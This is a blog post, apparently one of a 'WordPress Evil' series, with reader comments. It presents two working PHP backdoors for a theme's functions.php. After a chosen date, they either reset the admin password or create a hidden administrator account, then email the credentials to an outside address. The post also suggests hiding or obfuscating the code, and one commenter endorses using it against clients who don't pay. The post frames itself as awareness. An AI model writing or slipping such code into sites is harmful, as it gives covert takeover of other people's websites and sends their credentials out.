Creating a backdoor in WordPress

First post in my WordPress Evil series, I will demonstrate how I can create a backdoor in WordPress. Idea of this post came from a question on WordPress Answers where someone asked - Is there a security risk giving someone temporary access to my blog's code?

Example #1

Change the admin password after a certain date or time and inform us! Sounds good?

<?php
if ( strtotime( "2011-04-30" ) < time() ) {

    $target_admin_id = 1; // change this if admin has a different ID or you want to attach a particular admin
    $target_admin_new_password = 'evilme';
    $target_admin_userinfo = get_userdata( $target_admin_id );

    if ( !wp_check_password( $target_admin_new_password, $target_admin_userinfo->user_pass , $target_admin_id ) ) { // Have we already changed the password?

        add_action( 'shutdown', 'evilme_change_admin_password' );

        function evilme_change_admin_password() {

            global $target_admin_id;
            global $target_admin_new_password;
            global $target_admin_userinfo;

            wp_set_password( $target_admin_new_password, $target_admin_id );

            // now email me that my password of admin account has changed ready

            wp_mail( 'ashishsainiashfame@gmail.com', 'Admin password has been changed!', 'WP URL - '.get_bloginfo( 'wpurl' ).' | username: '.$target_admin_userinfo->user_login.' | password: '.$target_admin_new_password );
        }
    }
}

?>

At the very beginning, I checked if the current time is passed April 30, then execute all this code. Change it to the date when you want the backdoor to be created. The basic logic is to set the password of a user using wp_set_password() and keep a check on the password so as to avoid a database write and an alert email sent to you on every page load.

I have attached it to the shutdown hook so that it doesn't disturb the page output exactly when it happens. Change the email address and the new password you want to set and try this on a demo WordPress install by pasting the code in functions.php file.

Example #2

Create a new admin user after a certain date or time and ping us when ready!

<?php
if ( strtotime( "2011-04-30" ) < time() ) {

    // Required for username_exists()
    require_once( ABSPATH . WPINC . '/registration.php' );

    if ( !username_exists( 'ashfame-evil' ) ) { // Have we already done it once?

        add_action( 'shutdown', 'evilme_create_new_admin' );

        function evilme_create_new_admin() {

            $user_id = wp_insert_user( array(

                'user_login' => 'ashfame-evil',

                'user_pass' => 'evilme',

                'user_email' => 'ashishsainiashfame@hotmail.com',

                'role' => 'administrator'

            ) );

            // now email me that my new admin account is ready

            wp_mail( 'ashishsainiashfame@gmail.com', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: ashfame-evil | password: evilme' );
        }
    }

}

?>

Again I check for the date, and if the condition satisfies, I used wp_insert_user() to create a new administrator user. To make sure the code only do this once, I keep a check if the username I want to create exists or not. If its does, we have already created a new admin user of which you should have got an email. You can test this too by changing the email address and putting the code in your functions.php file.

Ideally you don't keep this code easily visible, you can just hide it anywhere. Deep inside functions.php file, some custom plugin or even obfuscate the code.

This tutorial was solely for the purpose of fun & making people aware about the fact that it is not safe when you provide temporary access to your blog. If they did what just I demonstrated you would see everything fine, there will be nothing you can make note of but after the timer, it will create a backdoor. More logical implementation would be to create a administrator account at a certain amount of time, and then delete that user after 1 hour every day/week. The User ID would go up, and might create suspicion after quite some time, but possibilities are endless. Be smart, be aware, spread the word about it. Friends don't let friends fall for others' trap.

If you have any questions about the code here, feel free to shoot me a question in the comments. And don't forget to share this post on Facebook & Tweet it!

Subscribe to feeds so as not to miss any of the evil posts! ;)

Published by

Ashfame

Developer + Entrepreneur + Opensource fanatic. Love WordPress + Startups + Music + Adrenaline kick.

  • Joe

    From your comment above – “Be smart, be aware, spread the word about it. Friends don’t let friends fall for others’ trap.

    OKAY? Now how do I go about making sure the freelancer who did work for us did not leave evil code and a back door in my WP installation?

    Joe

    • http://www.ashfame.com/ Ashfame

      There is really no way other than checking the code. It can be anywhere in the whole WordPress. We are just talking about feasibility. If you hire someone to do the work, make sure the guy is not a random freelancer or some shady character, else he might have this in the code first and can be evil with some disagreements between you and him. Always hire a good developer to do the job.

      The whole post was an idea to demonstrate that if you give someone access to the code once, they can get back on it afterwards.

      Tip – Open source guys are preferable, as they are really not after money and are actually the guys who can do it but won’t do it.

    • http://www.ashfame.com/ Ashfame

      Oh and by that comment, I meant sharing this post with other fellow publishers so that they are aware of it. Facebook / Twitter or any other. :)

  • http://viptabloid.com/ukraine.html Ukraine

    It runs on WordPress higher than 3?

  • http://www.ineed.ws/en/our_work/cat/wordpress/ ineed

    It’s a nice tool to use when your customer forgets to pay for a project :) thanks!